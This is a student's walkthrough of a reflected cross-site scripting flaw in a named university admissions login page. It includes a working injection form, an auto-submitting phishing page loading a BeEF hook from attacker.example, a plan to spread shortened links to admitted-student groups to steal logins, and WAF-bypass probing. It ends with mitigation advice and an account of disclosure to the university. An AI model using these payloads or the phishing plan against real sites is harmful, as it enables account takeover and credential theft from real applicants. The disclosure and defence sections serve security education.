Real-Life Simple XSS Walkthrough

Jennings Zhang

Prerequisites: you should already know basic HTML and HTTP (that's it).

Our target:

https://ugadmissions.northeastern.edu/ApplicantApp/ApplicantAppLogin.asp

Game Plan

  1. Make the website produce an error message
  2. Spoof the request so that you can customize the error message
  3. Include malicious code in the error message
  4. Create an HTML website that links to your malicious code
  5. Send it to 12th graders

See also: https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html

Reverse Engineering

Many combinations of form data are possible. The format is checked client-side, but whether an account actually exists can only be checked against the remote database. First, submit well-formatted credentials for an account that doesn't exist and watch the network traffic: the login turns into two POST requests, one to ApplicantAppLoginCheck.asp and then another back to ApplicantAppLogin.asp.

That seems redundant: why are two POSTs being made and not just one? Looking at the first response, from applicantapplogincheck.asp, it returns some HTML (purpose unknown) plus the hidden form below:

<input type='hidden' name='FormAction' value='Reset'>
<Body onload='javascript:document.forms[0].submit()'>
<form name='ApplicantAppLoginCheck' method='post' action='ApplicantAppLogin.asp'>
  <input type='hidden' name='errormsg' value='Applicant not found. Please check your NU ID and password'>
  <input type='hidden' name='logintoken' value=''>
  <input type='hidden' name='admissionsdataid' value=''>
</form>

Oh, okay. That form auto-submits, redirecting to ApplicantAppLogin.asp with the key “errormsg” in the POST body.

What if we just copied and pasted that form and played with it ourselves? This is the red flag: whenever you see text in the request that also appears word-for-word in the webpage, there is a chance that something is breakable.

<html>
<head><title>nu ugadmissions custom xss</title></head>
<body>
<form action="https://ugadmissions.northeastern.edu/ApplicantApp/ApplicantAppLogin.asp" method="post">
<em>errormsg: </em>
<input type="text" name="errormsg">
<input type="hidden" name="logintoken">
<input type="hidden" name="admissionsdataid">
<input type="submit">
</form>
</body>
</html>

Opening this document in the browser, we get a text input field. Whatever we type is inserted as HTML into the actual page at ApplicantAppLogin.asp without server-side sanitization. If we type <script>…, it is possible to execute arbitrary code in the context of a victim’s session on northeastern.edu.

<script>alert('dftba')</script>

Weaponization

Reminder: Google what you don’t know!

It is easiest to use BeEF, the Browser Exploitation Framework. Include a keylogger in errormsg. POST hides our malicious payload in the HTTP body, so users are unlikely to notice anything fishy. Put this in a hidden form on a phishing site and use a URL shortener (e.g. bit.ly) to obfuscate the link. Post that link in one of those Facebook groups like “Northeastern University Admitted Class of 2024!!!” Collect login credentials.
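To make the delivery step concrete, here is a hypothetical sketch of such a phishing page. It reuses the endpoint and field names from the custom form above and auto-submits on load, just like the hidden form the server itself returned; attacker.example is a placeholder for a server we would control, and :3000/hook.js is BeEF's default hook location.

<html>
<head><title>Northeastern Class of 2024 application status</title></head>
<!-- Hypothetical sketch: the hidden errormsg value is a script tag loading the BeEF hook. -->
<!-- The HTML entities are decoded on submission, so the server receives a literal <script> tag. -->
<body onload="document.forms[0].submit()">
<form action="https://ugadmissions.northeastern.edu/ApplicantApp/ApplicantAppLogin.asp" method="post">
<input type="hidden" name="errormsg"
       value="&lt;script src='http://attacker.example:3000/hook.js'&gt;&lt;/script&gt;">
<input type="hidden" name="logintoken">
<input type="hidden" name="admissionsdataid">
</form>
</body>
</html>

The victim never sees this page; the form submits immediately and they land on the real ApplicantAppLogin.asp, now running our hook.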

As for evil ideas, we could change their majors to something under CSSH. Maybe the boost in enrollment would help the department with funding!

Mitigation

This login process seems redundant: why two POSTs instead of one? Moreover, server-side validation is crucial. No incoming data can be trusted.

Content-Security-Policy and X-XSS-Protection are simple response headers that can help.
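For instance, assuming we could change the server's output, a restrictive policy like the sketch below would block both inline scripts and scripts loaded from other origins; in practice the same policy, plus X-XSS-Protection: 1; mode=block, would be sent as HTTP response headers rather than a meta tag.

<!-- Minimal sketch: only run scripts from the site's own origin, and no inline scripts. -->
<meta http-equiv="Content-Security-Policy"
      content="default-src 'self'; script-src 'self'">

Either of the payloads above (the inline alert or an externally hosted hook.js) would be refused by a browser enforcing this policy.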

There are hundreds of known XSS payloads. Security professionals use fuzzers to automatically test them against every endpoint.

Google Chrome can block naive XSS attacks like this one, where the payload appears verbatim in the request (though this protection is easy to work around). Firefox 68 is vulnerable.

As always, Google is your friend. https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html

NU’s Response

I “responsibly disclosed” the vulnerability via email with a thorough explanation to my CS Fundies teacher (Alan Mislove), who got me in touch with the Office of Information Security at Northeastern. They were as surprised as I was, because a web application firewall (WAF) should have been protecting the site.

After two weeks, it seems like the WAF is working. The WAF filters strings using a negative security model, a.k.a. a blacklist. This bug won’t work anymore; however, HTML injection is still possible.

WAF Attack

Hacking is illegal, and I’m not being paid. Though I should have stopped here, let’s try a few more tricks before giving up.

Let’s do some research first:

In a different situation, we would want to do reconnaissance first. I’m skipping recon because I don’t want to get sued. We already know a few things. Most importantly,

  • a web application firewall is filtering strings
  • the server programming language is ASP.NET

What are the exact patterns that are blocked? Let’s try a few.

  1. <script
  2. javascript
  3. alert(
  4. <img src=
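To test these systematically, one option is a small helper page that builds a pre-filled form per candidate string. This is a sketch in the same spirit as the custom form above, reusing its endpoint and field names; submit each form and check whether the string comes back reflected, HTML-encoded, or blocked outright.

<html>
<head><title>nu ugadmissions waf probe</title></head>
<body>
<script>
// Sketch: one pre-filled form per candidate, all pointing at the same
// endpoint and field names as the custom XSS form above.
var endpoint = 'https://ugadmissions.northeastern.edu/ApplicantApp/ApplicantAppLogin.asp';
// '<script' is split only so tools that naively scan for nested script tags are not confused.
var candidates = ['<scr' + 'ipt', 'javascript', 'alert(', '<img src='];
candidates.forEach(function (candidate) {
  var form = document.createElement('form');
  form.action = endpoint;
  form.method = 'post';
  form.target = '_blank'; // each result opens in its own tab
  var msg = document.createElement('input');
  msg.name = 'errormsg';
  msg.value = candidate;
  form.appendChild(msg);
  // include the other hidden fields the real form expects
  ['logintoken', 'admissionsdataid'].forEach(function (name) {
    var hidden = document.createElement('input');
    hidden.type = 'hidden';
    hidden.name = name;
    form.appendChild(hidden);
  });
  var submit = document.createElement('input');
  submit.type = 'submit';
  submit.value = 'try: ' + candidate;
  form.appendChild(submit);
  document.body.appendChild(form);
});
</script>
</body>
</html>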

It’s most likely that the WAF runs before the ASP code, which is a security risk: an obfuscated payload can slip past the WAF and then be normalized by ASP.NET into a working payload.

ASP.NET removes invalid “%” symbols. “errormsg=h%%ey%” becomes “hey”.

ASP.NET concatenates duplicate parameters in the query string. For example, “errormsg=hey&errormsg=you” becomes “hey, you”. By the way, this splitting might be able to bypass Chrome’s XSS detection, since the payload no longer appears verbatim in any single parameter.

errormsg=alert(+%2F*&errormsg=*%2F+%27hey%27) =>
alert( /*, */ 'hey')
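Assuming the POST body gets the same treatment as the query string, the same split can be delivered from the custom form by giving it two errormsg fields, as sketched below. Note that this only exercises the concatenation; smuggling the result into a script context without tripping the WAF is the part I never solved.

<form action="https://ugadmissions.northeastern.edu/ApplicantApp/ApplicantAppLogin.asp" method="post">
<!-- The two halves are joined server-side with ", ", and the /* ... */ comment swallows the inserted comma. -->
<input type="hidden" name="errormsg" value="alert( /*">
<input type="hidden" name="errormsg" value="*/ 'hey')">
<input type="hidden" name="logintoken">
<input type="hidden" name="admissionsdataid">
<input type="submit">
</form>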

Given more time and resources, I’m sure that there is some creative solution that can break through. However, I haven’t figured it out.

Reflection

Kolb's Experiential Learning Cycle

When I first discovered this bug in April of 2018, it was a simpler GET request. My report to the Registrar went unanswered, though a week later the problem was lazily “fixed.” Two server-side functions are relevant: one to produce the error message, and one to show it. The show function was disabled. Consequently, no error messages were shown for invalid logins, which is a poor user experience. Note that the produce function was never changed or disabled; under some conditions, it would still get called. Obsolete code is evidence of technical debt.

I rediscovered this bug a year later, in July of 2019. It’s messier than I initially thought. The same flaw exists because the developers failed to write reusable code. Instead of abstracting the common functionality into a single function, the unsafe code that shows the error message was copied and pasted into different parts of the back-end. One occurrence was fixed, but unfortunately a second occurrence was still exposed. This time, a second function that produces the error from an HTML form using POST was in play. This is actually more convenient for a nefarious hacker: the malicious code is hidden in the request body, so victims are very unlikely to notice the payload.

Thanks to Alan Mislove for helping me bring the issue to the right person. After the bug went unnoticed for a year, it took another month for someone to fix this textbook example of XSS with a band-aid solution.

Firewalls reduce the burden on developers to adhere to good security practices. Ideally, a firewall acts as secondary protection; it should be no excuse for bad code.

Everyone who writes code ought to be wary of cybersecurity “red flags” like these. I hope this write-up demonstrates that reverse-engineering public-facing web apps can be terrifyingly easy.

Written by Jennings Zhang, Computer Science/Biology student.
